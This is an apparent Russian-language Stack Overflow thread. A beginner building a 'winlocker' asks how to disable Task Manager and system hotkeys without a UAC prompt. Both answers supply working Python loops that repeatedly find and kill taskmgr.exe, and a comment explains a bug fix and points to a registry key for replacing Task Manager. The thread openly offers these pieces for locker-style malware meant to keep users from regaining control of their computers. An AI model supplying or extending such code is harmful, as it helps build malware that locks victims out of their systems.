# Блокировка диспетчера задач в Питоне

Tags: python, uac, диспетчер-задач

Я начинающий программист и ради развлечения леплю простенький винлокер. Хотел бы узнать как заблокировать диспетчер задач скриптом в питоне. А так же будет полезной инфа как заблокировать сочетания клавиш (по типу alt+f4, ctrl+shift+esc, alt+tab). Желательно что бы все это происходило без запроса повышения UAC, или же запроса админа. Но если так сделать не возможно, напишите пожалуйста как сделать запрос повышения UAC, из скрипта питона))
ОС-Windows, python-3.7.0
Спасибо.

Answer (score 4):

Не лучшая идея этим заниматься, тем более на python. Будем надеятся, что это исключительно для образовательной цели.

Вы можете мгновенно закрывать диспетчер задач при его открытии таким способом:

```
# !pip isntall psutil
import psutil
while True:
  for proc in psutil.process_iter():
    if proc.name().lower() == 'taskmgr.exe':
      proc.terminate()
```

Comment: У меня не сработало, т.к. имя процесса было с верхнего регистра :) Тогда уж: `if proc.name().lower() == 'taskmgr.exe':`

Comment: Не буду спорить, но и не вижу повода придераться. Я показал вам алгоритм. Используйте асинхронность и контролируйте попытки открытия диспетчера. Также можете прописать абсолютный путь к диспетчеру

Comment: Пишете так, будто я автор вопроса :) Я не придираюсь, а подсказываю где в вашем алгоритме минус из-за чего он не работает как было заявлено. С вашей стороны хорошо бы принять критику и подправить код. Это обычное дело, как код-ревью

Comment: Кст, путь к диспетчеру задач не абсолютный. Можно подменить диспетчер своим через путь в реестре `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe` (там 2 пути, пример кода в https://github.com/gil9red/SimplePyScripts/blob/aa3b5277b5bf5385039b9c31865ba69908d6c6a1/winreg__examples/get_image_file_execution_options.py). У меня какое-то время использовался SystemExplorer и тот в том пути подменял себя как `C:\Program Files (x86)\System Explorer\SystemExplorer.exe`. Но у большинства будет стандартный путь

Comment: Почему то окно винлокера вообще не открывается, когда я добавляю этот скрипт

Answer (score 0):

В последнее время я начал использовать не сторонние питоновские библиотеки, а `os.system()`, поэтому вот что у меня вышло:

```
import os
import subprocess

while True:
    tasks = subprocess.getoutput('tasklist').split('\n')[4:]
    for task in tasks:
        if 'taskmgr.exe' in task.lower():
            os.system(r'taskkill /im taskmgr.exe /f')
            print('Диспетчер задач заблокирован')
```

`subprocess` здесь для того, чтобы получить список процессов, а точнее список строк, с процессами и их характеристиками.

Спасибо за внимание. Это мой первый ответ на переполненном стэке)